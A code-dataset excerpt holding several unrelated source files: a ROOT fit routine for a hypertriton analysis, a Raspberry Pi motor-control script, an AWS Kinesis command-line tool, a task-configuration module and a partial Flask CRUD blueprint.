sigTpl.SetParameter(2, fit_tpl.GetParameter(n_bkgpars+2))\n sigTpl.SetLineColor(600)\n # sigTpl.Draw(\"same\")\n\n # get the fit parameters\n mu = fit_tpl.GetParameter(n_bkgpars+1)\n muErr = fit_tpl.GetParError(n_bkgpars+1)\n sigma = fit_tpl.GetParameter(n_bkgpars+2)\n sigmaErr = fit_tpl.GetParError(n_bkgpars+2)\n signal = fit_tpl.GetParameter(n_bkgpars) / histo.GetBinWidth(1)\n errsignal = fit_tpl.GetParError(n_bkgpars) / histo.GetBinWidth(1)\n bkg = bkg_tpl.Integral(mu - nsigma * sigma, mu +\n nsigma * sigma) / histo.GetBinWidth(1)\n\n if bkg > 0:\n errbkg = math.sqrt(bkg)\n else:\n errbkg = 0\n # compute the significance\n if signal+bkg > 0:\n signif = signal/math.sqrt(signal+bkg)\n deriv_sig = 1/math.sqrt(signal+bkg)-signif/(2*(signal+bkg))\n deriv_bkg = -signal/(2*(math.pow(signal+bkg, 1.5)))\n errsignif = math.sqrt((errsignal*deriv_sig)**2+(errbkg*deriv_bkg)**2)\n else:\n signif = 0\n errsignif = 0\n\n # print fit info on the canvas\n pinfo2 = TPaveText(0.5, 0.5, 0.91, 0.9, \"NDC\")\n pinfo2.SetBorderSize(0)\n pinfo2.SetFillStyle(0)\n pinfo2.SetTextAlign(30+3)\n pinfo2.SetTextFont(42)\n\n string = f'ALICE Internal, Pb-Pb 2018 {cent_class[0]}-{cent_class[1]}%'\n pinfo2.AddText(string)\n \n decay_label = {\n \"\": ['{}^{3}_{#Lambda}H#rightarrow ^{3}He#pi^{-} + c.c.','{}^{3}_{#Lambda}H#rightarrow dp#pi^{-} + c.c.'],\n \"_matter\": ['{}^{3}_{#Lambda}H#rightarrow ^{3}He#pi^{-}','{}^{3}_{#Lambda}H#rightarrow dp#pi^{-}'],\n \"_antimatter\": ['{}^{3}_{#bar{#Lambda}}#bar{H}#rightarrow ^{3}#bar{He}#pi^{+}','{}^{3}_{#Lambda}H#rightarrow #bar{d}#bar{p}#pi^{+}'],\n }\n\n string = decay_label[split][mode-2]+', %i #leq #it{ct} < %i cm %i #leq #it{p}_{T} < %i GeV/#it{c} ' % (\n ct_range[0], ct_range[1], pt_range[0], pt_range[1])\n pinfo2.AddText(string)\n\n string = f'#mu {mu*1000:.2f} #pm {muErr*1000:.2f} MeV/c^{2}'\n pinfo2.AddText(string)\n\n string = f'#sigma {sigma*1000:.2f} #pm {sigmaErr*1000:.2f} MeV/c^{2}'\n pinfo2.AddText(string)\n if fit_tpl.GetNDF()>0:\n string = f'#chi^{2}/NDF {fit_tpl.GetChisquare()/fit_tpl.GetNDF():.2f} '\n pinfo2.AddText(string)\n\n string = f'Significance ({nsigma:.0f}#sigma) {signif:.1f} #pm {errsignif:.1f} '\n pinfo2.AddText(string)\n\n string = f'S2 
({nsigma:.0f}#sigma) {signal:.0f} #pm {errsignal:.0f}'\n pinfo2.AddText(string)\n\n string = f'B ({nsigma:.0f}#sigma) {bkg:.0f} #pm {errbkg:.0f}'\n pinfo2.AddText(string)\n\n if bkg > 0:\n ratio = signal/bkg\n string = f'S/B ({nsigma:.0f}#sigma) {ratio:.4f}'\n\n pinfo2.AddText(string)\n pinfo2.Draw()\n gStyle.SetOptStat(0)\n\n st = histo.FindObject('stats')\n if isinstance(st, TPaveStats):\n st.SetX1NDC(0.12)\n st.SetY1NDC(0.62)\n st.SetX2NDC(0.40)\n st.SetY2NDC(0.90)\n st.SetOptStat(0)\n\n histo.Write()\n cv.Write()\n\n return (signal, errsignal, signif, errsignif, mu, muErr, sigma, sigmaErr)\n return (signal, errsignal, signif, errsignif, sigma, sigmaErr)\n\n\ndef load_mcsigma(cent_class, pt_range, ct_range, mode, split=''):\n info_string = f'_{cent_class[0]}{cent_class[1]}_{pt_range[0]}{pt_range[1]}_{ct_range[0]}{ct_range[1]}{split}'\n sigma_path = os.environ['HYPERML_UTILS_{}'.format(mode)] + '/FixedSigma'\n\n file_name = f'{sigma_path}/sigma_array{info_string}.npy'\n\n return np.load(file_name, allow_pickle=True)\n\n\ndef rename_df_columns(df):\n rename_dict = {}\n\n for col in df.columns:\n\n if col.endswith('_f'):\n rename_dict[col] = col[:-2]\n \n df.rename(columns = rename_dict, inplace=True)\n\ndef df2roo(df, observables=None, columns=None, name='data', weights=None, ownership=True, bins=None,\n norm_weights=True):\n \"\"\" Convert a DataFrame into a RooDataSet\n The `column` parameters select features of the DataFrame which should be included in the RooDataSet.\n\n Args:\n df (DataFrame or array) :\n Input data to be transformed to a RooDataSet\n observables (dict) :\n Dictionary of observables to convert data with the correct range of the observables of interest\n columns (:obj:`list` of :obj:`str`, optional) :\n List of column names of the DataFrame\n name (:obj:`str`)\n Name of the Dataset should be unique to avoid problems with ROOT\n weights (:obj:`str` or array, optional) :\n Name or values of weights to assign weights to the RooDataSet\n ownership (bool, optional) :\n Experimental, True for ROOT garbage collection\n bins (int):\n creates RooDataHist instead with specified number of bins\n norm_weights (bool) :\n Normalise weights to sum of events\n\n Returns:\n RooDataSet : A conversion of the DataFrame\n\n Todo:\n * Get rid of either columns or observables\n * Allow observables to be list or dict\n \"\"\"\n\n # Return DataFrame object\n if isinstance(df, ROOT.RooDataSet):\n return df\n\n # TODO Convert Numpy Array\n if not isinstance(df, pd.DataFrame):\n print(\"Did not receive DataFrame\")\n assert observables is not None, \"Did not receive an observable \"\n assert len(observables) == 1, \"Can only handle 1d array, use pd.DataFrame instead\"\n assert len(np.array(df).shape) == 1, \"Can only handle 1d array, use pd.DataFrame instead\"\n d = {list(observables.keys())[0]: np.array(df)}\n df = pd.DataFrame(d)\n\n assert isinstance(df, pd.DataFrame), \"Something in the conversion went wrong\"\n\n # Gather columns in the DataFrame to be included in the rooDataSet\n if columns is None:\n if observables is not None:\n columns = [observables[v].GetName() for v in observables]\n if columns is not None:\n for v in columns:\n assert v in df.columns, \"Variable %s not in DataFrame\" % v\n else:\n columns = df.columns\n\n df_subset = df[columns]\n\n # Add weights into roofit format\n if weights is not None:\n if isinstance(weights, str):\n df_subset['w'] = df[weights]\n else:\n assert len(weights) == len(df), \"Strange length of the weights\"\n df_subset['w'] = weights\n # Check if 
weights are normalized\n w = df_subset['w']\n if norm_weights:\n if len(w) != int(np.sum(w)):\n df_subset['w'] *= len(w)/float(np.sum(w))\n\n # Check for NaN values\n if df_subset.isnull().values.any():\n df_subset = df_subset.dropna()\n print(\"NaN Warning\")\n\n # WARNING: possible memory leak\n df_tree = array2tree(df_subset.to_records())\n ROOT.SetOwnership(df_tree, ownership)\n\n roo_argset = ROOT.RooArgSet()\n roo_var_list = [] # Hast to exist due to the python2 garbage collector\n\n # If no observables are passed, convert all columns and create dummy variables\n if observables is None:\n for c in columns:\n v = ROOT.RooRealVar(c, c, df_subset[c].mean(), df_subset[c].min(), df_subset[c].max(), )\n roo_var_list.append(v)\n\n roo_argset.add(v)\n else:\n for v in observables:\n roo_argset.add(observables[v])\n roo_var_list.append(observables[v])\n\n # Create final roofit data-set\n if weights is not None:\n w = ROOT.RooRealVar('w', 'Weights', df_subset['w'].mean(), df_subset['w'].min(), df_subset['w'].max(), )\n roo_argset.add(w)\n roo_var_list.append(w)\n df_roo = ROOT.RooDataSet(name, name, roo_argset, ROOT.RooFit.Import(df_tree), ROOT.RooFit.WeightVar(w),)\n else:\n df_roo = ROOT.RooDataSet(name, name, roo_argset, ROOT.RooFit.Import(df_tree),)\n ROOT.SetOwnership(df_roo, ownership)\n\n # Experimental: return histogram data if bins are set\n if bins is not None:\n return roo2hist(df_roo, bins, roo_var_list[0], name, roo_argset)\n\n return df_roo\n\ndef roo2hist(roo, binning, obs, name, observables=None):\n \"\"\" Convert data to a histogram\n\n Args:\n roo (ROOT.RooAbsData):\n Dataset to be binned\n binning (int):\n Number of bins\n obs (ROOT.RooAbsReal):\n Observable(s) to be binned\n name (str):\n Name of the resulting histogram\n observables (ROOT.RooArgSet):\n Set of observables\n\n Returns:\n hist (ROOT.RooDataHist) Binned data\n\n \"\"\"\n\n obs.setBins(binning)\n\n if observables is None:\n observables = ROOT.RooArgSet()\n observables.add(obs)\n\n hist = ROOT.RooDataHist(name, \"Data Hist\", observables, roo)\n\n return hist\n","sub_path":"common/TrainingAndTesting/hyp_analysis_utils.py","file_name":"hyp_analysis_utils.py","file_ext":"py","file_size_in_byte":18011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"368074405","text":"import RPi.GPIO as gpio\nimport time\n#curses is used to capture the keyboard input\nimport curses\n\nclass Propulsion(object):\n\n def init(self):\n\n gpio.setwarnings(False)\n\n #Set the pinmode to BCM\n gpio.setmode(gpio.BCM)\n\n #init the curses screen\n self.stdscr = curses.initscr()\n\n #use cbreak to not require a return key press\n curses.cbreak()\n self.quit=False\n\n self.speed1 = 30\n self.speed2 = 30\n\n def resetGpio(self):\n gpio.setmode(gpio.BCM)\n gpio.setup(18, gpio.OUT)\n gpio.setup(13, gpio.OUT)\n #Set pulse modulation to 50hz for pin 18 and 13 and store that initialization in a va$\n self.pwm1 = gpio.PWM(18, 50)\n self.pwm2 = gpio.PWM(13, 50)\n #Start the pwm at 0% duty cycle\n self.pwm1.start(0)\n self.pwm2.start(0)\t\n gpio.setup(17, gpio.OUT)\n gpio.setup(22, gpio.OUT)\n gpio.setup(23, gpio.OUT)\n gpio.setup(24, gpio.OUT)\n gpio.setup(18, gpio.OUT)\n gpio.setup(13, gpio.OUT)\n self.pwm1.ChangeDutyCycle(self.speed1)\n self.pwm2.ChangeDutyCycle(self.speed2)\n\t\n def forward(self, tf):\n self.resetGpio()\n print(\"inching forward with speed \"+ str(self.speed1))\n gpio.output(17, True)\n gpio.output(22, False)\n gpio.output(23, True)\n gpio.output(24, False)\n time.sleep(tf)\n gpio.cleanup()\n\n def reverse(self, tf):\n self.resetGpio()\n print(\"awkwardly backing away with speed \"+ str(self.speed1))\n gpio.output(17, False)\n gpio.output(22, True)\n gpio.output(23, False)\n gpio.output(24, True)\n time.sleep(tf)\n gpio.cleanup()\n\n def left(self, tf):\n self.resetGpio()\n print(\"squeezing left speed \"+ str(self.speed1))\n gpio.output(17, False)\n gpio.output(22, False)\n gpio.output(23, True)\n gpio.output(24, False)\n time.sleep(tf)\n gpio.cleanup()\n\n def right(self, tf):\n self.resetGpio()\n print(\"squeezing left speed \"+ str(self.speed1))\n gpio.output(17, True)\n gpio.output(22, False)\n gpio.output(23, False)\n gpio.output(24, False)\n time.sleep(tf)\n gpio.cleanup()\n\n def start(self):\n try:\n while quit!=True:\n print (\"waiting for input...\")\n #get the entered characters\n c = self.stdscr.getch()\n #dont know what this line does tbh\n curses.endwin()\n if curses.keyname(c)==\"w\" :\n self.forward(2)\n elif curses.keyname(c)==\"s\" :\n self.reverse(2)\n elif curses.keyname(c)==\"l\" :\n self.left(1)\n elif curses.keyname(c)==\"r\" :\n self.right(1)\n elif curses.keyname(c)==\"u\" and self.speed1 <= 90:\n self.speed1 += 10 \n self.speed2 += 10\n elif curses.keyname(c)==\"d\" and self.speed1 >= 40:\n self.speed1 -= 10\n self.speed2 -= 10\n #print curses.keyname(c),\n # if curses.keyname(c)==\"q\" :\n # quit=True\n except KeyboardInterrupt:\n self.pwm.stop()\n gpio.cleanup()\n \n def stop(self):\n self.resetGpio()\npropulsion = Propulsion()\npropulsion.init()\npropulsion.start()\n\n\n\n\n\n\n","sub_path":"motorCode/pwmDC2.py","file_name":"pwmDC2.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"388119697","text":"#!/usr/bin/env python3\n\nimport argparse\nimport base64\nimport gzip\nimport json\nimport logging\nimport os\nimport random\nimport sys\nimport time\nimport traceback\nimport datetime\nfrom itertools import starmap\nfrom typing import List, Dict\n\nimport boto3\n\n_ACTION_LIST_STREAMS = 'list-streams'\n_ACTION_PUT_RECORDS = 'put-records'\n_ACTION_PUT_DATA = 'put-data'\n_ACTION_GET_RECORDS = 'get-records'\n_ACTION_PRINT_DATA = 'print-data'\n_ACTION_DUMP_DATA = 'dump-data'\nHUMAN_READABLE_TIME_FORMAT = '%Y-%m-%d %H.%M.%S.%f %z'\n\nlogger = logging.getLogger(__name__)\nlogging.captureWarnings(True)\n\n\ndef logger_init(logging_h: logging.Logger):\n common_log_format = '[%(asctime)s:%(name)s:%(levelname)s:%(process)d] %(message)s'\n console_handler = logging.StreamHandler()\n console_formatter = logging.Formatter(\n fmt=common_log_format,\n datefmt='%Y%m%d:%H%M%S'\n )\n console_handler.setFormatter(console_formatter)\n logging_h.handlers = [console_handler]\n\n\ndef json_serial(obj):\n \"\"\"JSON serializer for objects not serializable by default json code\"\"\"\n\n if isinstance(obj, (datetime.datetime, datetime.date)):\n return obj.isoformat()\n if isinstance(obj, bytes):\n return str(base64.b64encode(obj))\n raise TypeError(\"Type %s not serializable\" % type(obj))\n\n\ndef chunker(seq, size):\n for i in range(0, len(seq), size):\n yield seq[i:i + size]\n\n\nclass KinesisManager:\n def __init__(self, aws_profile: str = None):\n self.aws_profile_name = aws_profile\n self.kinesis = self.init_kinesis_client()\n self.time_to_sleep = 1\n\n def init_kinesis_client(self):\n if self.aws_profile_name:\n aws_session = boto3.session.Session(profile_name=self.aws_profile_name)\n return aws_session.client('kinesis')\n else:\n return boto3.client('kinesis')\n\n def list_streams(self):\n for stream in self.kinesis.list_streams()['StreamNames']:\n print(stream)\n\n def put_records_wrapper(self, records: List[dict], stream: str):\n try:\n upload_result = self.kinesis.put_records(Records=records, StreamName=stream)\n except Exception as e:\n logger.warning(f'{e}. Chilling out for 61 seconds. Resending.')\n time.sleep(61)\n upload_result = self.kinesis.put_records(Records=records, StreamName=stream)\n if upload_result['FailedRecordCount'] != 0:\n error_cause = upload_result.get('Records', [{}])[-1].get('ErrorMessage', 'Undefined')\n logger.error(f'Something went wrong while sending data. Resending, last try. 
Caused by: {error_cause}')\n time.sleep(61)\n self.kinesis.put_records(Records=records, StreamName=stream)\n\n def put_files(self, directory, stream):\n records = []\n for file in os.listdir(directory):\n if file.endswith('.json'):\n with open(os.path.join(directory, file)) as fd:\n payload = fd.read()\n records.append(gzip.compress(payload.encode('utf-8')))\n logger.debug(f'File added: {file}')\n self.data_upload(stream, records, True)\n\n def data_upload(self, stream: str, data: list, compressed: bool, no_sleep: bool = False):\n shards_count = len(self.kinesis.describe_stream(StreamName=stream)['StreamDescription']['Shards'])\n compressed_records = []\n for data_entry in data:\n if compressed:\n compressed_entry = data_entry\n else:\n compressed_entry = gzip.compress(json.dumps(data_entry).encode('utf-8'))\n part_key = f'{random.randrange(1024)}_{random.randrange(1024)}'\n compressed_records.append({'Data': compressed_entry, 'PartitionKey': part_key})\n\n # Kinesis put records can handle only 500 records per batch\n for records_chunk in chunker(compressed_records, 500 * shards_count):\n batch_to_send = []\n batch_size = 0\n for record in records_chunk:\n record_size = sys.getsizeof(record['Data']) + sys.getsizeof(record['PartitionKey'])\n if batch_size + record_size >= 1000000 * shards_count:\n logger.info(f'Batch is full: {len(batch_to_send)} records ({batch_size / 1024:.2f} KiB). Sending')\n self.put_records_wrapper(batch_to_send, stream)\n batch_to_send.clear()\n batch_size = 0\n batch_to_send.append(record)\n batch_size += record_size\n logger.info(f'Sleeping for {self.time_to_sleep} seconds')\n time.sleep(self.time_to_sleep)\n else:\n logger.debug(f'Batch has {len(batch_to_send)} records ({batch_size / 1024:.2f} KiB). Adding')\n batch_to_send.append(record)\n batch_size += sys.getsizeof(record['Data']) + sys.getsizeof(record['PartitionKey'])\n # Sending final batch if there is something left\n if batch_to_send:\n logger.info(f'Batch is ready: {len(batch_to_send)} records ({batch_size / 1024:.2f} KiB). 
Sending')\n self.put_records_wrapper(batch_to_send, stream)\n if not no_sleep:\n logger.info(f'Sleeping for {self.time_to_sleep} seconds')\n time.sleep(self.time_to_sleep)\n\n def get_data(self, stream, shard_iterator_type, destination: str):\n for shard in self.kinesis.list_shards(StreamName=stream)['Shards']:\n shard_it = self.kinesis.get_shard_iterator(\n StreamName=stream,\n ShardId=shard['ShardId'],\n ShardIteratorType=shard_iterator_type\n )\n print(\"Process shard:\", shard['ShardId'])\n for record in self.kinesis.get_records(ShardIterator=shard_it['ShardIterator'])['Records']:\n print(\"Process: \", record['PartitionKey'], record['SequenceNumber'])\n with open(\"{output_folder}/{partition_key}-{record_id}.json\".format(\n output_folder=destination,\n partition_key=record['PartitionKey'],\n record_id=record['SequenceNumber']\n ), 'wb') as fd:\n data = record.get('Data')\n payload = gzip.decompress(data)\n fd.write(payload)\n\n def get_records_generator(self, stream, sh_t, shard: str, shard_iterator: str, no_linger: bool = False,\n raw_data: bool = False):\n logger.debug(f'get_records_generator created with parameters: {shard}, no_linger = {no_linger}')\n sleep_between_queries = 1\n records_per_batch = 1000\n last_pos = 0\n while shard_iterator:\n try:\n kinesis_answer = self.kinesis.get_records(Limit=records_per_batch, ShardIterator=shard_iterator)\n shard_iterator = kinesis_answer.get('NextShardIterator')\n if len(kinesis_answer['Records']) > 0:\n sleep_between_queries = 1\n records_per_batch = 1000\n for record in kinesis_answer.get('Records', []):\n compressed_payload = record['Data']\n sequence_number = int(record['SequenceNumber'])\n date_of_arrival = record['ApproximateArrivalTimestamp']\n if raw_data:\n record_data = compressed_payload\n else:\n try:\n record_data = gzip.decompress(compressed_payload).decode('utf-8')\n except OSError as e:\n logger.error(f'Non-gzipped data received from the stream. Ignoring:\\n{e}')\n continue\n payload = {\n 'data': record_data,\n 'shard_id': shard,\n 'sequence_number': sequence_number,\n 'date_of_arrival': date_of_arrival\n }\n yield payload\n last_pos = sequence_number\n if len(kinesis_answer['Records']) == 0 and kinesis_answer['MillisBehindLatest'] == 0 and no_linger:\n logger.info(f'No more data in shard {shard}. Stopping')\n shard_iterator = None\n return\n elif len(kinesis_answer['Records']) == 0:\n logger.debug(f'No data in {shard} Yielding from generator to allow aggregator check other shards')\n sleep_between_queries = 0.4\n records_per_batch = 10000\n yield {}\n logger.debug(f'Sleeping for {sleep_between_queries} seconds')\n time.sleep(sleep_between_queries)\n except self.kinesis.exceptions.ProvisionedThroughputExceededException as e:\n logger.warning(f'Kinesis throughput exceeded. Chilling for 6 seconds. Specifics:\\n{e}')\n sleep_between_queries += 0.05\n time.sleep(6)\n except self.kinesis.exceptions.ExpiredIteratorException as e:\n logger.warning('ExpiredIteratorException. Obtaining new iterator: {}'.format(e))\n try:\n shard_iterator = self.get_iterator(stream, shard, sh_t, last_pos)\n except Exception as e:\n logger.warning(f'Unable to acquire shard iterator. Will try again. {e}')\n except Exception as e:\n logger.warning(\n 'Unexpected error while polling Kinesis stream for data: {}. 
Traceback:\\n {}'.format(\n e, '\\r'.join(traceback.format_tb(e.__traceback__))\n )\n )\n logger.info('Reinitializing Kinesis client and trying to reacquire shard iterator...')\n time.sleep(6)\n try:\n self.kinesis = self.init_kinesis_client()\n shard_iterator = self.get_iterator(stream, shard, sh_t, last_pos)\n except Exception as e:\n logger.warning(f'Unable to acquire shard iterator. Will try again. {e}')\n\n def get_iterator(self, stream: str, shard: str, iterator_type: str = None, position=None):\n ts = None\n sn = None\n if (iterator_type == 'AT_SEQUENCE_NUMBER' or iterator_type == 'AFTER_SEQUENCE_NUMBER') and position:\n sn = str(position)\n elif 'AT_TIMESTAMP' and position:\n if isinstance(position, datetime.datetime):\n ts = position\n else:\n # There is supposedly a time-representative stream-position information\n if ((isinstance(position, str) and position.replace('.', '', 1).isdigit())\n or isinstance(position, (int, float))):\n try:\n ts = datetime.datetime.utcfromtimestamp(float(position))\n except Exception as e:\n logger.info('Unsuccessfully tried to parse stream timestamp from {}. {}'.format(position, e))\n else:\n try:\n ts = datetime.datetime.strptime(position, HUMAN_READABLE_TIME_FORMAT)\n except Exception as e:\n logger.info('Unsuccessfully tried to parse stream timestamp from {}. {}'.format(position, e))\n if sn:\n logger.info('Acquiring iterator of type {} from {}'.format(iterator_type, sn))\n iterator = self.kinesis.get_shard_iterator(\n StreamName=stream,\n ShardId=shard,\n ShardIteratorType=iterator_type,\n StartingSequenceNumber=sn\n )['ShardIterator']\n elif iterator_type == 'AT_TIMESTAMP' and ts:\n logger.info('Acquiring iterator of type {} from {}'.format(iterator_type, ts))\n iterator = self.kinesis.get_shard_iterator(\n StreamName=stream,\n ShardId=shard,\n ShardIteratorType=iterator_type,\n Timestamp=ts\n )['ShardIterator']\n elif iterator_type == 'LATEST':\n logger.info('Acquiring iterator of type {}'.format(iterator_type))\n iterator = self.kinesis.get_shard_iterator(\n StreamName=stream,\n ShardId=shard,\n ShardIteratorType=iterator_type\n )['ShardIterator']\n else:\n # 'TRIM_HORIZON'\n logger.info('Acquiring iterator of type {}'.format('TRIM_HORIZON'))\n iterator = self.kinesis.get_shard_iterator(\n StreamName=stream,\n ShardId=shard,\n ShardIteratorType='TRIM_HORIZON'\n )['ShardIterator']\n return iterator\n\n def data_feed(self, stream: str, shard_iterator_type: str, no_linger: bool,\n shards: Dict[str, Dict[str, int]] = None, no_decompress: bool = False) -> List[dict]:\n valid_shards = 0\n # Even if there is a shards dict provided, there could be new shards present in the stream.\n for shard_d in self.kinesis.list_shards(StreamName=stream)['Shards']:\n if not shards:\n shards = {shard_d['ShardId']: {}}\n elif shard_d['ShardId'] not in shards:\n # Adding newly discovered shard to the shards dictionary.\n shards[shard_d['ShardId']] = {}\n for shard, specs in shards.items():\n pos = specs.get('starting_sequence_number') or specs.get('date_of_arrival')\n try:\n if pos:\n shards[shard]['shard_iterator'] = self.get_iterator(\n stream,\n shard,\n iterator_type=shard_iterator_type,\n position=specs.get('starting_sequence_number')\n )\n else:\n shards[shard]['shard_iterator'] = self.get_iterator(\n stream,\n shard,\n iterator_type=shard_iterator_type\n )\n valid_shards += 1\n except self.kinesis.exceptions.ResourceNotFoundException:\n logger.warning(f'Tried to get iterator for a closed shard {shard}. 
Skipping.')\n continue\n except Exception as e:\n logger.error(f'Unexpected error while trying to obtain iterator for {shard}. Skipping. {e}')\n continue\n if valid_shards == 0:\n logger.error('Something went terribly wrong, there are not any shard iterators obtained.')\n return\n logger.debug('data_feed routine. Setup code end')\n shard_pollers = []\n shard_pollers.extend(starmap(\n self.get_records_generator,\n [\n (stream, shard_iterator_type, s, shards[s]['shard_iterator'], no_linger, no_decompress)\n for s in shards.keys() if shards[s].get('shard_iterator')\n ]\n ))\n while shard_pollers:\n for generator in shard_pollers:\n try:\n retrieved_record = generator.__next__()\n if retrieved_record:\n yield retrieved_record\n else:\n continue\n except StopIteration:\n logger.debug(f'data_feed routine. Generator for shard exhausted. Removing it from the cycle.')\n shard_pollers.remove(generator)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--debug', action='store_true')\n sp = parser.add_subparsers(dest='action')\n\n sp.add_parser(_ACTION_LIST_STREAMS, help='list available streams')\n\n sp_put = sp.add_parser(_ACTION_PUT_RECORDS, help='put records from directory to Kinesis stream')\n sp_put.add_argument('--stream-name', help='stream name', required=True)\n sp_put.add_argument('--files', help='path to files', required=True)\n\n sp_up = sp.add_parser(_ACTION_PUT_DATA, help='Upload json data to Kinesis stream')\n sp_up.add_argument('--stream-name', help='stream name', required=True)\n sp_up.add_argument('data', help='Data to send. Should be a string with array of valid json objects\\n'\n 'e.g.: -------------------------------------------------'\n '[{\"EvInfo\":{\"EventId\":\"176\"}},{\"EvInfo\":{\"EventId\":\"177\"}}]')\n\n sp_get = sp.add_parser(_ACTION_GET_RECORDS, help='OUTDATED! 
Write records from Kinesis stream as files.')\n sp_get.add_argument('--stream-name', help='stream name', required=True)\n sp_get.add_argument('--shard-iterator-type', help='shard iterator type', choices=['LATEST', 'TRIM_HORIZON'])\n sp_get.add_argument('--output', help='output folder')\n\n sp_print = sp.add_parser(_ACTION_PRINT_DATA, help='Print Kinesis stream data to stdout.')\n sp_print.add_argument('--stream-name', help='stream name', required=True)\n sp_print.add_argument('--shard-iterator-type', help='shard iterator type', choices=['LATEST', 'TRIM_HORIZON'],\n default='LATEST')\n sp_print.add_argument('--no-linger', action='store_true',\n help='If selected - stop after all data from the stream has been received')\n\n sp_dump = sp.add_parser(_ACTION_DUMP_DATA, help='Dump Kinesis stream data to folder.')\n sp_dump.add_argument('--stream-name', help='stream name', required=True)\n sp_dump.add_argument('--shard-iterator-type', help='shard iterator type', choices=['LATEST', 'TRIM_HORIZON'],\n default='LATEST')\n sp_dump.add_argument('--no-linger', action='store_true',\n help='If selected - stop after all data from the stream has been received')\n sp_dump.add_argument('--output', help='output folder')\n\n args = parser.parse_args()\n\n if 'debug' not in args:\n args.debug = False\n if args.debug:\n logger.setLevel('DEBUG')\n else:\n logger.setLevel('INFO')\n logger_init(logger)\n kmanager = KinesisManager()\n\n if args.action == _ACTION_LIST_STREAMS:\n kmanager.list_streams()\n elif args.action == _ACTION_PUT_RECORDS:\n kmanager.put_files(args.files, args.stream_name)\n elif args.action == _ACTION_PUT_DATA:\n try:\n normalized_data = json.loads(args.data)\n except json.JSONDecodeError as e:\n logger.error('Input data in wrong format!\\n'.format(e))\n sys.exit(1)\n kmanager.data_upload(args.stream_name, normalized_data, False)\n elif args.action == _ACTION_GET_RECORDS:\n kmanager.get_data(args.stream_name, args.shard_iterator_type, args.output)\n elif args.action == _ACTION_PRINT_DATA:\n for record in kmanager.data_feed(args.stream_name, args.shard_iterator_type, args.no_linger):\n logger.debug(f\"{record['shard_id']}, {record['sequence_number']}, {record['date_of_arrival']}\")\n print(record['data'])\n elif args.action == _ACTION_DUMP_DATA:\n for record in kmanager.data_feed(args.stream_name, args.shard_iterator_type, args.no_linger):\n json_repr = json.loads(record['data'])\n if 'OrderHeader' in json_repr.keys():\n payload_header = 'OrderHeader'\n record_date = 'OrderDate'\n elif 'ReturnHeaderUDM' in json_repr.keys():\n payload_header = 'ReturnHeaderUDM'\n record_date = 'ReturnDate'\n elif 'CouponHeader' in json_repr.keys():\n payload_header = 'CouponHeader'\n record_date = 'CreatedTimestamp'\n else:\n payload_header = 'EventInfo'\n record_date = 'SourceTimestamp'\n\n file_path = \"{output_folder}/{date}-{event_id}.json\".format(\n output_folder=args.output,\n date=json_repr.get(payload_header, {}).get(record_date, '1978-01-01 00:00:00+0000')[:10],\n event_id=json_repr.get('EventInfo', {}).get('EventID', '')\n )\n logger.info(f'Writing file {file_path}')\n with open(file_path, 'wb') as fd:\n fd.write(record['data'])\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"utils/python/kinesis_tools.py","file_name":"kinesis_tools.py","file_ext":"py","file_size_in_byte":20463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"159694512","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 21 17:44:31 2019\n\n@author: Daniel\n\"\"\"\n\nimport torchvision.transforms as transforms\nimport eval_helper\nimport custom_dataset_classes as cdc\nimport data_transforms as dt\n\n## in data_loader.py\n\n'''\nNote: empty transforms are placeholders (and they are required to be there)\n'''\n\ndef get_transforms(params):\n task = params.task\n if task == 'mtm_smooth' or task == 'mtm_geo' or task == 'mtm_arap' or task == 'mtm_weighted_arap':\n train_transformer = transforms.Compose([dt.BsplineDeformGridSample_64x64x64(sigma=params.bspline_deform_sigma,\n order=params.bspline_deform_order,\n deform_chance=params.bspline_deform_chance)])\n eval_transformer = transforms.Compose([])\n \n return train_transformer, eval_transformer\n\n## in data_loader.py\n\ndef get_full_ds(data_dir, label_dir, eval_transformer, params):\n task = params.task\n if task == 'mtm_smooth' or task == 'mtm_geo' or task == 'mtm_arap' or task == 'mtm_weighted_arap':\n full_ds = cdc.CT_just_load_gt_pcl_Dataset(data_dir, label_dir, eval_transformer)\n \n return full_ds\n\n## in main.py\n\ndef get_loss_fn(params, task):\n if task == 'mtm_smooth':\n loss_fn = eval_helper.ChamferSmoothnessGtPcl(lambdas=params.loss_lambdas)\n elif task == 'mtm_geo':\n loss_fn = eval_helper.ChamferGeoGtPcl(lambdas=params.loss_lambdas, edge_loss_which=params.edge_loss_which)\n elif task == 'mtm_arap':\n loss_fn = eval_helper.ChamferARAPGtPcl(params.arap_template_filename, lambdas=params.loss_lambdas)\n elif task == 'mtm_weighted_arap':\n loss_fn = eval_helper.ChamferWeightedARAPGtPcl(params.arap_template_filename1, params.arap_template_filename2,\n lambdas=params.loss_lambdas, softmax_base_exp=params.arap_softmax_base_exp,\n deform_gradient_method=params.deform_gradient_method, distortion_type=params.distortion_type)\n\n return loss_fn\n","sub_path":"things_to_modify_for_tasks.py","file_name":"things_to_modify_for_tasks.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"347922202","text":"import datetime\n\nfrom flask import Blueprint, request\n\nfrom data.database import db\nfrom domain.models.Curriculo import Curriculo\n\nbp = Blueprint('curriculos_controllers', __name__, url_prefix='/curriculos')\n\n\n@bp.route('/list', methods=['GET'])\ndef list_curriculos_candidato():\n try:\n return {'curriculos': [curriculo.to_dict() for curriculo in\n Curriculo.query.filter_by(id_candidato=request.args.get('id_candidato')).all()]}\n except Exception as exc:\n return {'error': str(exc)}\n\n\n@bp.route('/get', methods=['GET'])\ndef get_curriculo():\n try:\n return Curriculo.query.filter_by(id_curriculo=request.args.get('id_curriculo')).first().to_dict()\n except Exception as exc:\n return {'error': str(exc)}\n\n\n@bp.route('/create', methods=['POST'])\ndef create_curriculo():\n try:\n curriculo_criar = Curriculo(**request.form)\n db.session.add(curriculo_criar)\n db.session.commit()\n return {'message': 'curriculo criado com sucesso'}\n except Exception as exc:\n return {'error': str(exc)}\n\n\n@bp.route('/update', methods=['PUT'])\ndef update_curriculo():\n try:\n 